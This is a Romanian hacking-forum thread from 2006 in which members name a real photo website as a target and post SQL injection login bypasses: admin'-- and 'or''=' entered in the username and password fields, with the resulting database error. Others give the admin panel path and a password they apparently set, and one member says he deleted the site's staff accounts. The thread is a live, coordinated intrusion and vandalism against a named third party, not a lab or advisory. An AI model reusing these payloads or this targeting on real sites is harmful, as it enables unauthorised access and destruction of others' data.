escalation666 Posted December 10, 2006 Report Posted December 10, 2006 http://www.fotoshop.ro that's the targetWhy? pt ca face spamVulnerabilitate:sql injection Poc: user:admin'--Database error: Invalid SQL: SELECT u.id_user, u.id_user_group, u.status, u.email, ug.level, u.user_name FROM site_user u, site_user_group ug WHERE u.password='' AND u.user_name='admin'--' AND ug.id_user_group = u.id_user_groupMySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ug.id_user_group = u.id_user_group' at line 5)Am o lene prea mare zilele astea ca sa incerc sa aflu parola de admin.De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta. Quote
lordping Posted December 10, 2006 Report Posted December 10, 2006 http://www.fotoshop.ro/admin + datele de mai sus ... => acces la parola adminului si altele Quote
J0K3R Posted December 10, 2006 Report Posted December 10, 2006 escalation666 wrote: De asemenea, daca pui la user si parola 'or''=' o sa ai o surpriza placuta.Asta e un SQL Injection ? :? Quote
Guest flama Posted December 10, 2006 Report Posted December 10, 2006 user: kadajpass: sugipulascuzatzi parola asta in caz ca nu va mai merge sql injectul Quote
Crhistmas Posted December 10, 2006 Report Posted December 10, 2006 Io stiam ca iei sursa codului scoti java din el astfel incat sa vezi la pass ce scrii si pui ceva de genu " * or 1+1 -- " si la user ce vrei...tu...nush daca e corect...daca nu sa ma corectati Oricum multam Quote
escalation666 Posted December 10, 2006 Author Report Posted December 10, 2006 gg flama!christmas...se poate si asa...probabil ai vazut chestia asta dintr-un tutorial video e util sa faci asta cand la username trebuie sa pui o adresa de email...si javascriptul nu te lasa sa pui ceva de genu [mail]dfdf@fdwfdw.com[/mail] Quote
Crhistmas Posted December 10, 2006 Report Posted December 10, 2006 Aham multumesc dar exista vreun program care face munca mai usoara ? Quote
Ras Posted December 10, 2006 Report Posted December 10, 2006 tu vrei sa fie un buton pe care sa apesi si gata site-ul sa fie al tau ?? :@ :@ Quote
devianc3 Posted December 10, 2006 Report Posted December 10, 2006 zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Quote
greeny Posted December 10, 2006 Report Posted December 10, 2006 devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@ Quote
impure Posted December 10, 2006 Report Posted December 10, 2006 sa vad si eu cei pe situ ala sa vad care este treba Quote
Guest flama Posted December 11, 2006 Report Posted December 11, 2006 greeny wrote: devianc3 wrote: zice ca-i membru inexistent.. s-o jucat careva cu useru` lu` asta? gen.. change username? Am sters tot ce era la grupul "staff" din memberlist. Nu cred ca e o problema pt noi, mai degraba pt detinatorul site-ului :@offf numai pe distrugeri suntetzi pushi mai copii Quote
Sad_Dreamer Posted December 11, 2006 Report Posted December 11, 2006 ce lame...dupa ce ca au primit parola mura-n gura mai si sterg tot..pff..fking kids daca eram in locul lui spiry ii dadeam ban aluia...aia sunt parteneri cu share.urbanfriends.us Quote
thelegend Posted December 11, 2006 Report Posted December 11, 2006 misto treaba. c my faci tov sad dreamer? ma mai tzii minte? bafta Quote
4n4rchyl04d3r Posted December 17, 2006 Report Posted December 17, 2006 ...winers dont use copys.... Quote